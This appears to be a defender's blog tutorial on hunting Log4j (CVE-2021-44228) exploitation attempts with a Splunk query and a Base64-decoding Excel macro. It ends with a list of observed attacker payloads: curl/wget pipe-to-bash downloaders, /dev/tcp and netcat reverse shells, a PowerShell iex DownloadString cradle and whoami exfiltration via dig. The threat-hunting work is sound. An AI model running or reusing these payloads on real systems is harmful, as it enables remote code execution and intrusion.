Hunting for Log4j RCE (CVE-2021-44228) using Splunk & Excel

As you are aware, a new Log4j vulnerability (CVE-2021-44228) has been disclosed and is currently being exploited in the wild.

So I’m using the Splunk query below, based on the Splunk blog post [1], to see whether there have been any attempts to use this vulnerability/exploit against our assets:

index=* "${jndi:*" Base64 
| eval _time_UTC = _time - (strptime("2000-01-01 +00:00", "%F %:z") - strptime("2000-01-01 " . strftime(_time,"%:z"), "%F %Z")) 
| eval time_in_UTC = strftime(_time_UTC, "%F %T UTC") 
| rex field=_raw "[jJnNdDiI]{4}(\:|\%3A|\/|\%2F)(?<proto>\w+)(\:\/\/|\%3A\%2F\%2F)(\$\{.*?\}(\.)?)?(?<rce_dest>[a-zA-Z0-9\.\-\_\$\{\:]+)" 
| rex field=_raw "\/Base64\/(?<string>\S+)}" 
| table time_in_UTC proto rce_dest string sourcetype 

As you can see, a number of attempts against our infrastructure were observed over the past 7 days:

The raw event looks something like this:

2021-12-10 19:27:20 X.X.X.X GET /owa/auth/logon.aspx url=https%3a%2f%2fX.X.X.X%2fowa%2f&reason=0&CorrelationID=<empty>;&ClientId=AGS0JSW0AJIUEPWEVZ&cafeReqId=13016af6-7c1b-4e2f-b148-1cc2399d2b08; 443 - X.X.X.X ${jndi:ldap://} https://X.X.X.X/owa/ 200 0 0 0

The Splunk query above returns the data as a table, with the extracted Base64 under the field named “string”.

The result after exporting it from Splunk (and opening it in Excel) looks like this:

If you decode the Base64 from the example raw event above, it appears to be a curl/wget download-and-execute attempt against our infrastructure:

(curl -s||wget -q -O-|bash

I’m wondering: how can I quickly decode all these Base64 strings? We are not going to decode them one by one, are we? There are hundreds, probably thousands, of them.

So… we are going to leverage Excel and a macro (yes, you read that right: a MACRO) to decode those Base64 strings for us automatically. We are going to Excel-Fu our way out of this data.

The macro code that we’ll be using is as follows:

' Encodes a string to Base64, reading the text in the given charset
' (e.g. "ASCII" or "UTF-8"). Not needed for the decoding step, but kept
' so the module can go both ways.
Function TextBase64Encode(strText, strCharset)

    Dim arrBytes

    ' Write the text into an ADODB stream, then re-read it as raw bytes
    With CreateObject("ADODB.Stream")
        .Type = 2 ' adTypeText
        .Charset = strCharset
        .WriteText strText
        .Position = 0
        .Type = 1 ' adTypeBinary
        arrBytes = .Read
    End With

    ' Let MSXML do the Base64 encoding of the byte array
    With CreateObject("MSXML2.DOMDocument").createElement("tmp")
        .DataType = "bin.base64"
        .nodeTypedValue = arrBytes
        ' MSXML wraps long output with CR/LF; strip the line breaks
        TextBase64Encode = Replace(Replace(.Text, vbCr, ""), vbLf, "")
    End With

End Function

' Decodes a Base64 string and interprets the resulting bytes in the given
' charset. This is the function the worksheet formula calls: the Base64
' cell is strBase64 and the "ASCII" cell is strCharset.
Function TextBase64Decode(strBase64, strCharset)

    Dim arrBinary

    ' Let MSXML do the Base64 decoding into a byte array
    With CreateObject("MSXML2.DOMDocument").createElement("tmp")
        .DataType = "bin.base64"
        .Text = strBase64
        arrBinary = .nodeTypedValue
    End With

    ' Write the bytes into an ADODB stream and read them back as text
    With CreateObject("ADODB.Stream")
        .Type = 1 ' adTypeBinary
        .Write arrBinary
        .Position = 0
        .Type = 2 ' adTypeText
        .Charset = strCharset
        TextBase64Decode = .ReadText
    End With

End Function

To use it, first open the Splunk result that we exported earlier.

After that, press Alt-F8 to open the Macro dialog. Create a new macro; you can give it any name you want. For example, I named it “Base64”:

A new window (the VBA editor) will open. Paste the macro code given above into the editor:

After that, close the editor window but leave Excel open.

Then create two new columns in the Excel sheet, named “ASCII” and “Decoded Base64”:

We need to fill the “ASCII” column with the string “ASCII” down to the bottom of the data. If you have 300 rows of data in your sheet, fill 300 cells beside them with “ASCII”.

Press Ctrl + Arrow-Down to jump to the bottom of the data column. Type the string “ASCII” in one of the rows and copy it (Ctrl-C). Then press Ctrl + Shift + Arrow-Up to select from the bottom to the top, and paste (Ctrl + V) to fill the whole column with “ASCII”.

Your Excel will look something like this:

Next, we are going to start decoding the Base64 strings.

Again, press Ctrl + Arrow-Down to go to the end of the column, and type the formula as below. The formula calls the TextBase64Decode function from the macro with the cell from the “string” column as its first argument and the matching cell from the “ASCII” column as its second (the charset):

Refer to the example below:

Then, again, copy the cell with the formula, press Ctrl + Shift + Arrow-Up to select from the bottom to the top, and paste (Ctrl + V) the formula into the whole selected range under “Decoded Base64”.

That’s it. We have successfully decoded all the Base64 strings via Excel.

List of attempt that I’ve observed so far:

(curl || wget -q -O-|bash
(curl -S||wget|bash
/bin/bash -i >& /dev/tcp/
bash -i  >& /dev/tcp/ 0>&1
bash -i >& /dev/tcp/ 0>&1
cmd.exe /c powershell.exe -c Invoke-WebRequest
dig $(whoami)
dig $(whoami)
nc 8888 -e /bin/bash ; curl -o ; chmod +x ./ ;bash ; dig 
powershell -c iex ((New-Object System.Net.WebClient).DownloadString(''))
telnet 443
touch /tmp/pwned
wget;curl -O;chmod 777 aaa;./aaa

